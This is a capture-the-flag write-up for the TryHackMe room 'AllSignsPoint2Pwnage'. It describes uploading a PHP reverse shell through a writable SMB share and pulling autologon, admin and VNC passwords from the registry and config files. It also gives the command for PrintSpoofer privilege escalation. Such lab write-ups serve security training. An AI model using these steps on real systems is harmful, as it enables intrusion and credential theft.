AllSignsPoint2Pwnage
https://tryhackme.com/room/allsignspoint2pwnage
User flag
Let's start with nmap
We see there are a bunch of open ports. Let's start with port 21.
We see there's a txt file that could be interesting. Let's download it and read it.
By the contents of the file we can guess there will be a folder somewhere where we will be able to upload images. Let's check the smb ports and see if it's there.
We have read and write perms on the "images$" folder. Seems like we can use it to upload a rev shell.
Let's check if it exists the folder "images" on port 80. If it exists maybe we can get upload a rev shell and trigger it from there.
It exists. We've tried to upload a .aspx shell but it didn't work. We can use the following php reverse shell (it's an upgrade of the famous php rev shell from pentestmonkey and it works for Windows) :
We upload the shell through smb.
Start the nc listener and fire up that shell.
We are in. Let's grab that flag.
Root flag
The hint tell us that the user is automatically logged into the computer so we can use this command to retrieve the password:
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
Now for the admin password we can go to C:\Installs and take a look at the files .
Checking the "install_www_and_deploy_bat" give us the admin password.
For the vnc password we can read the ultravnc.ini.
We need to decode that password
We have to download "vncpwd.exe" and upload it to the victim machine using smbclient
To get the admin account we tried to log into the machine using psexec and using the password we saw in the file but it didn't work. We have to try another method, let's check our privilieges:
whoami /priv
We have "SeImpersonatePrivilege" enabled so we can use the PrintSpoofer vulnerability to get privesc as we've already seen in the room "Relevant".
Let's upload the "PrintSpoofer.exe" file with smbclient and execute it.
PrintSpoofer.exe -i -c cmd
Let's grab the flag
Last updated
Was this helpful?